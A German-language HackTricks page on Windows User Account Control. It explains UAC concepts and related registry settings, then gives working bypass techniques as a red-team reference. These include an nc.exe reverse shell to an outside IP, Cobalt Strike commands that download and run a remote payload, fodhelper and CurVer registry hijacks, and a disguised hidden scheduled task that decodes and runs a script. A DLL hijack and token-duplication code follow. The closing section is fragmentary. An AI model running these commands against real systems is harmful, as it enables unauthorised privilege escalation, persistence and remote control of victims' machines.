UAC - User Account Control

Tip

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Durchsuche den vollständigen HackTricks Training-Katalog nach den Assessment-Tracks (ARTA/GRTA/AzRTA) und Linux Hacking Expert (LHE).

Support HackTricks

• Sieh dir die subscription plans an!
• Tritt der 💬 Discord group, der telegram group bei, folge @hacktricks_live auf X/Twitter, oder schau dir die LinkedIn page und den YouTube channel an.
• Teile hacking tricks, indem du PRs in die HackTricks und HackTricks Cloud github repos einreichst.

UAC

User Account Control (UAC) ist eine Funktion, die einen Bestätigungsdialog für erhöhte Aktivitäten ermöglicht. Anwendungen haben unterschiedliche integrity-Stufen, und ein Programm mit einer hohen Stufe kann Aufgaben ausführen, die das System potenziell kompromittieren könnten. Wenn UAC aktiviert ist, werden Anwendungen und Aufgaben immer unter dem Sicherheitskontext eines Nicht-Administrator-Kontos ausgeführt, sofern ein Administrator diesen Anwendungen/Aufgaben nicht ausdrücklich Administratorzugriff auf das System zur Ausführung gewährt. Es ist eine Komfortfunktion, die Administratoren vor unbeabsichtigten Änderungen schützt, gilt jedoch nicht als Sicherheitsgrenze.

Mehr Infos zu integrity levels:

Integrity Levels

Wenn UAC aktiviert ist, erhält ein Administratorbenutzer 2 Tokens: einen Standardbenutzerschlüssel, um normale Aktionen auf normalem Level auszuführen, und einen mit den Admin-Rechten.

Diese Seite beschreibt ausführlich, wie UAC funktioniert, einschließlich des Anmeldeprozesses, der Benutzererfahrung und der UAC-Architektur. Administratoren können Sicherheitsrichtlinien verwenden, um festzulegen, wie UAC in ihrer Organisation lokal funktioniert (über secpol.msc) oder per Group Policy Objects (GPO) in einer Active Directory-Domäne auszurollen. Die verschiedenen Einstellungen werden hier detailliert beschrieben. Es gibt 10 Group Policy-Einstellungen, die für UAC gesetzt werden können. Die folgende Tabelle bietet zusätzliche Details:

Richtlinien für die Softwareinstallation auf Windows

Die lokalen Sicherheitsrichtlinien (“secpol.msc” auf den meisten Systemen) sind standardmäßig so konfiguriert, dass sie Nicht-Admin-Benutzern die Installation von Software verwehren. Das bedeutet, dass selbst wenn ein Nicht-Admin-Benutzer das Installationsprogramm für deine Software herunterladen kann, er es ohne ein Admin-Konto nicht ausführen kann.

Registry Keys, um UAC zur Nachfrage nach Erhöhung zu zwingen

Als Standardbenutzer ohne Admin-Rechte kannst du sicherstellen, dass das “standard”-Konto von UAC zur Eingabe von Anmeldedaten aufgefordert wird, wenn es versucht, bestimmte Aktionen auszuführen. Diese Aktion würde das Ändern bestimmter Registry Keys erfordern, wofür du Admin-Berechtigungen brauchst, sofern es keinen UAC bypass gibt oder der Angreifer bereits als Admin angemeldet ist.

Selbst wenn der Benutzer in der Gruppe Administrators ist, zwingen diese Änderungen den Benutzer dazu, seine Kontodaten erneut einzugeben, um administrative Aktionen auszuführen.

Der einzige Nachteil ist, dass diese Vorgehensweise ein deaktiviertes UAC benötigt, damit sie funktioniert, was in Produktionsumgebungen eher unwahrscheinlich ist.

Die Registry Keys und Einträge, die du ändern musst, sind die folgenden (mit ihren Standardwerten in Klammern):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Dies kann auch manuell über das Local Security Policy-Tool erfolgen. Nach der Änderung werden bei administrativen Vorgängen Benutzer aufgefordert, ihre Anmeldedaten erneut einzugeben.

Hinweis

User Account Control ist keine Sicherheitsgrenze. Daher können Standardbenutzer nicht aus ihren Konten ausbrechen und Administratorrechte ohne einen local privilege escalation exploit erlangen.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Privileges

• Internet Explorer Protected Mode verwendet Integrity Checks, um Prozesse mit hoher Integrity-Level (wie Webbrowser) daran zu hindern, auf Daten mit niedriger Integrity-Level zuzugreifen (wie den Temporary Internet Files-Ordner). Das geschieht, indem der Browser mit einem low-integrity token ausgeführt wird. Wenn der Browser versucht, auf Daten im low-integrity zone zuzugreifen, prüft das Betriebssystem den Integrity Level des Prozesses und erlaubt den Zugriff entsprechend. Diese Funktion hilft dabei, remote code execution attacks daran zu hindern, auf sensible Daten auf dem System zuzugreifen.
• Wenn sich ein Benutzer bei Windows anmeldet, erstellt das System ein access token, das eine Liste der Privileges des Benutzers enthält. Privileges werden als Kombination aus den Rechten und Fähigkeiten eines Benutzers definiert. Das Token enthält außerdem eine Liste der credentials des Benutzers, die zur Authentifizierung des Benutzers am Computer und an Ressourcen im Netzwerk verwendet werden.

Autoadminlogon

Um Windows so zu konfigurieren, dass beim Start automatisch ein bestimmter Benutzer angemeldet wird, setze den AutoAdminLogon registry key. Das ist nützlich für Kiosk-Umgebungen oder zu Testzwecken. Verwende dies nur auf sicheren Systemen, da dadurch das Passwort in der registry offengelegt wird.

Setze die folgenden keys mit dem Registry Editor oder reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Um zum normalen Anmeldeverhalten zurückzukehren, setze AutoAdminLogon auf 0.

UAC bypass

Tip

Beachte, dass UAC bypass bei grafischem Zugriff auf das Opfer sehr einfach ist, da du einfach auf “Yes” klicken kannst, wenn die UAC-Abfrage erscheint

Der UAC bypass wird in der folgenden Situation benötigt: UAC ist aktiviert, dein Prozess läuft in einem medium integrity context, und dein Benutzer gehört zur administrators group.

Es ist wichtig zu erwähnen, dass es viel schwieriger ist, die UAC zu bypassen, wenn sie auf dem höchsten Sicherheitslevel (Always) steht, als wenn sie auf einem der anderen Levels (Default) steht.

UAC disabled

Wenn UAC bereits disabled ist (ConsentPromptBehaviorAdmin ist 0) kannst du eine reverse shell mit admin privileges (high integrity level) ausführen, zum Beispiel mit:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Very Basic UAC “bypass” (voller Dateisystemzugriff)

Wenn du eine Shell mit einem Benutzer hast, der Mitglied der Administrators-Gruppe ist, kannst du das über SMB (Dateisystem) freigegebene C$ lokal als neues Laufwerk mounten und du wirst Zugriff auf alles innerhalb des Dateisystems haben (sogar auf den Home-Ordner des Administrators).

Warning

Sieht so aus, als würde dieser Trick nicht mehr funktionieren

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC-Bypass mit cobalt strike

Die Cobalt Strike-Techniken funktionieren nur, wenn UAC nicht auf das maximale Sicherheitsniveau eingestellt ist

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire und Metasploit haben ebenfalls mehrere Module, um die UAC zu bypassen.

KRBUACBypass

Dokumentation und Tool in https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME ist eine Kompilierung mehrerer UAC bypass exploits. Beachte, dass du UACME mit Visual Studio oder msbuild kompilieren musst. Die Kompilierung erstellt mehrere ausführbare Dateien (wie Source\Akagi\outout\x64\Debug\Akagi.exe) , du musst wissen, welche du brauchst.
Du solltest vorsichtig sein, weil einige bypasses andere Programme auslösen können, die den Benutzer warnen, dass etwas passiert.

UACME hat die Build-Version, ab der jede Technik zu funktionieren begann. Du kannst nach einer Technik suchen, die deine Versionen betrifft:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Auch mit this Seite erhältst du die Windows-Release 1607 aus den Build-Versionen.

UAC Bypass – fodhelper.exe (Registry hijack)

Die vertrauenswürdige Binary fodhelper.exe wird auf modernen Windows-Versionen auto-elevated. Beim Start fragt sie den folgenden per-user Registry-Pfad ab, ohne das DelegateExecute-Verb zu validieren. Wenn du dort einen Befehl platzierst, kann ein Medium Integrity-Prozess (der Benutzer ist in Administrators) einen High Integrity-Prozess ohne UAC-Prompt starten.

Von fodhelper abgefragter Registry-Pfad:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Hinweise:
- Funktioniert, wenn der aktuelle Benutzer Mitglied von Administrators ist und der UAC-Level standardmäßig/locker ist (nicht Always Notify mit zusätzlichen Einschränkungen).
- Verwende den `sysnative`-Pfad, um eine 64-bit PowerShell aus einem 32-bit Prozess unter 64-bit Windows zu starten.
- Payload kann jeder beliebige Befehl sein (PowerShell, cmd oder ein EXE-Pfad). Vermeide UI-Prompts für Stealth.

#### CurVer/extension hijack-Variante (nur HKCU)

Neuere Samples, die `fodhelper.exe` missbrauchen, umgehen `DelegateExecute` und **leiten stattdessen die `ms-settings` ProgID** über den per-user `CurVer`-Wert um. Die auto-elevated Binary löst den Handler weiterhin unter `HKCU` auf, daher wird kein Admin-Token benötigt, um die Keys zu setzen:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"